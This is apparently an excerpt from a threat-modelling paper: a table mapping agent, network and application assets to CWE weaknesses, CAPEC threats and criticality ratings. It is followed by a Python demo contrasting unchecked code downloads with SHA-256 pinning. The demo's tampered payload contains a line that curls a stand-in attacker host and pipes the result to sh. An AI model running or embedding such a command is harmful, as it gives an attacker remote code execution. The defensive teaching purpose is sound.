Table 7.

| Asset id (Data-Level, Data-Phase) | Weaknesses | Threats | Criticality (Bt, Tc, Bi) |
|---|---|---|---|
| Agt0 ((bD, mD), (Dr, Dp, Dt)) | CWE-494: Download of Code Without Integrity Check [35] | CAPEC-662: Adversary in the Browser (AiTB) [36] | (M, M, L) → L |
| Agt0 ((bD, mD), (Dr)) | CWE-921: Storage of Sensitive Data in a Mechanism without Access Control [35] | CAPEC-196: Session Credential Falsification through Forging [36] | (L, L, M) → L |
| Agt1 (mD, Dr) | CWE-922: Insecure Storage of Sensitive Information [35] | CAPEC-529: Malware-Directed Internal Reconnaissance [36] | (M, M, H) → H |
| Net0 (mD, Dt) | CWE-319: Cleartext Transmission of Sensitive Information [35] | CAPEC-102: Session Sidejacking [36] | (M, L, L) → VL |
| Net0 (mD, Dp) | CWE-284: Improper Access Control [35] | CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs [36] | (M, M, L) → L |
| Net3 (mD, Dp) | CWE-308: Use of Single-factor Authentication [35] | CAPEC-151: Identity Spoofing [36] | (H, M, H) → VH |
| Net3 (bD, Dt) | CWE-770: Allocation of Resources Without Limits or Throttling [35] | CAPEC-125: Flooding [36] | (H, H, H) → VH |
| App0 ((bD, mD), Dp) | CWE-308: Use of Single-factor Authentication [35] | CAPEC-151: Identity Spoofing [36] | (H, M, H) → VH |
| App0 (bD, Dp) | CWE-20: Improper Input Validation [35] | CAPEC-63: Cross-Site Scripting (XSS) [37] | (H, H, H) → VH |
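The first row pairs CWE-494 with CAPEC-662: an adversary positioned in the browser or on the path can swap the body of a code download, and an agent that executes whatever arrives cannot tell. The following is an added illustration, not code from the paper or from the system it models: a constructed "agent update" blob, a constructed tampering step standing in for the AiTB adversary, and the two retrieval paths side by side. The weak path returns the blob as delivered; the hardened path compares a SHA-256 digest against a value the deployer pinned out of band (assumed here to come from a signed manifest, which is outside this example). Names such as `fetch_insecure`, `simulate_aitb` and `PINNED_SHA256` are the example's own.

```python
import hashlib
import hmac

# Constructed sample payloads (not taken from the paper or any real agent).
ORIGINAL_SCRIPT = b"print('agent update v1.2')\n"
TAMPERED_SCRIPT = (
    b"print('agent update v1.2')\n"
    b"import os; os.system('curl http://attacker.invalid/x | sh')\n"
)

# Digest the deployer obtained out of band; here derived from the known-good
# blob purely so the example is self-contained. In practice this value comes
# from a signed manifest, never from the same channel as the download.
PINNED_SHA256 = hashlib.sha256(ORIGINAL_SCRIPT).hexdigest()


def simulate_aitb(blob: bytes) -> bytes:
    """Stand-in for CAPEC-662: the adversary rewrites the body in transit."""
    return TAMPERED_SCRIPT if blob == ORIGINAL_SCRIPT else blob


def fetch_insecure(blob: bytes) -> bytes:
    """CWE-494 pattern: trust whatever arrives and hand it to the interpreter."""
    return blob


def fetch_with_integrity_check(blob: bytes, expected_hex: str) -> bytes:
    """Hardened path: reject the download unless its digest matches the pin.

    compare_digest avoids timing differences that leak how many leading
    hex characters matched.
    """
    actual_hex = hashlib.sha256(blob).hexdigest()
    if not hmac.compare_digest(actual_hex, expected_hex):
        raise ValueError("integrity check failed: digest mismatch")
    return blob


def accepts_tampered_code(fetch) -> bool:
    """Run one download through the AiTB adversary and report whether the
    given fetch routine would accept the tampered result for execution."""
    delivered = simulate_aitb(ORIGINAL_SCRIPT)
    try:
        accepted = fetch(delivered)
    except ValueError:
        return False
    return accepted != ORIGINAL_SCRIPT


if __name__ == "__main__":
    print("insecure fetch accepts tampered code:",
          accepts_tampered_code(fetch_insecure))
    print("checked fetch accepts tampered code:",
          accepts_tampered_code(
              lambda b: fetch_with_integrity_check(b, PINNED_SHA256)))
```

The check only helps if the pinned digest travels over a channel the adversary does not control; a hash served next to the file by the same web server is defeated by the same AiTB position, which is why signed manifests or signed code are the usual fix for this row.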